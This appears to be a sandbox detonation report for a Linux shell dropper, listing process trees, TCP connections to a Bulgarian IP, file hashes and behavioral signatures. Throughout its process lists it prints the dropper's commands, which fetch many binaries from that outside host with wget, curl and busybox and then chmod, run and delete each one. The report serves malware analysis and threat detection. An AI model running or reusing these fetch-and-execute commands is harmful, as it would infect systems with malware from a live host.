/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
18s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
Processes
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
